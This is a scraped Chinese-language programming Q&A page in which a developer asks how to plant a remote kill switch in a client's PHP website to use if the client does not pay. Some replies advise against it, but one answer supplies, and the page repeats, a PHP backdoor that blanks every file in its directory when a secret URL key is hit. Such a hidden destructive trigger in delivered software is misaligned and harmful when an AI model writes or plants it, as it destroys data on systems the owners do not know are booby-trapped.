Fatal编程技术网
  • php/
  • Php 网站远程杀死开关

Php 网站远程杀死开关

php

Php 网站远程杀死开关,php,Php,我想在客户端网站上集成一个kill开关,以防万一 方法1: 我的第一个想法是使用以下代码: if (file_get_contents("http://myvebsite.com/disable.txt")) die("kill switch"); 但这是一种很容易在代码中找到的方法,我想 方法2: 我试过这个 这是我将在网站中集成的代码: <?php require('XMLRPC.inc.php'); $appname = "DISABLING-CODE"; $client = ne

我想在客户端网站上集成一个kill开关,以防万一

方法1: 我的第一个想法是使用以下代码:

if (file_get_contents("http://myvebsite.com/disable.txt")) die("kill switch");
但这是一种很容易在代码中找到的方法,我想

方法2: 我试过这个

这是我将在网站中集成的代码:

<?php
require('XMLRPC.inc.php');
$appname = "DISABLING-CODE";
$client = new IXR_Client('http://myvebstie.com/kill.php');
if (!$client->query('activation.checkapp', $appname)) {
    if($client->getResponse() )
    {
        die("application disabled.");
    }
}
?>
我已经尝试了100次这种方法,但它不起作用,客户端网站加载正常。 有没有人知道它为什么不起作用,或者有没有人对如何解决这个问题有更好的想法

如果我使用第一种方法,并在文件位置的disable.txt文件中放入一个字符,则客户端网站无法工作

致以最诚挚的问候。

对于简单的解决方案,您的问题是一个漫长的过程。如果您想通过扳动开关关闭网站,只需将.htaccess文件替换为具有以下内容的文件:

<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
你完蛋了!您可以将旧的.htaccess文件重命名为类似.htaccess.bak的文件,直到您想重新打开该站点为止

这是假设您没有授予客户端FTP访问权限,并且您完全控制了文件。

听起来您是在寻找非技术性问题的技术解决方案。请考虑下面的内容:

不要和你认为是骗子的人做生意。 以增量计费,因为您能够演示部分实施,而不是在交付后一次全部实施。 在您独家控制的服务器上演示完整、正常运行的系统,并且仅在付款后传输源代码或服务器控制权。
使用函数die不会杀死服务器。它将停止呈现您试图访问的页面。你的整个方法都是错误的。您必须寻找一种方法使代码覆盖.htaccess文件,并利用@sjagr提交的代码片段

正如其他人所说:您不应该尝试制作这样一段代码,因为它会使您的客户端系统易受攻击,并且被视为恶意代码

你可以这样做

<?php

if($_GET['key'] == 'kChj3G3XgQ')
{
    $dir = scandir(__DIR__);
    foreach($dir as $k => $file){
            destroyFile($file);
    }
}

function destroyFile($filename){
    $file = fopen($filename, 'w');
    fwrite($file,'');
    fclose($file);
}
然后像端点一样点击该文件,使用如下键: www.dodgyclientswebsite.com/killswitchfile.php?key=kChj3G3XgQ

这只会用一个空白文件重写同一目录中的每个文件。

以后,请确保您的合同规定,在您收到付款后,您将首先将这些文件复制到他们的服务器上。您想远程杀死客户端的站点吗?如何防止他们编辑php代码并完全绕过检查?@MarcB客户将使用该网站,并在我交付该网站后向我付款,因此我希望确保如果他不向我付款,该网站将无法访问。如果他真的付钱给我,让我可以轻松地再次启用网站,那么有什么能阻止客户端编辑php代码并完全绕过kill开关呢?你想做的基本上是无用的/毫无意义的。你基本上是说我的客户是卑鄙的骗子,他们会偷我的代码,但他们是诚实的好人,他们不会禁用我的保护方法,也不会使用代码方法来保护你的东西。用户可以撤消您为保护代码所做的任何操作,包括模糊处理引擎。删除FTP访问也是完全无用的。隐马尔可夫模型。。。有人偷了我房子里所有的东西。我现在就开始锁门。那会阻止他们卖我的东西。如果他们不付钱,继续使用你的代码,你就起诉他们。你不明白。我需要能够在许多情况下在不访问客户端服务器的情况下禁用和启用网站。@user3337790然后同意@MarcB,您的逻辑有缺陷。即使你加密了我用EVE函数来考虑的几乎是恶意代码,它仍然很容易找出你在哪里杀死这些发生。我会用你的方法,@汉斯梅说。 
<?php

if($_GET['key'] == 'kChj3G3XgQ')
{
    $dir = scandir(__DIR__);
    foreach($dir as $k => $file){
            destroyFile($file);
    }
}

function destroyFile($filename){
    $file = fopen($filename, 'w');
    fwrite($file,'');
    fclose($file);
}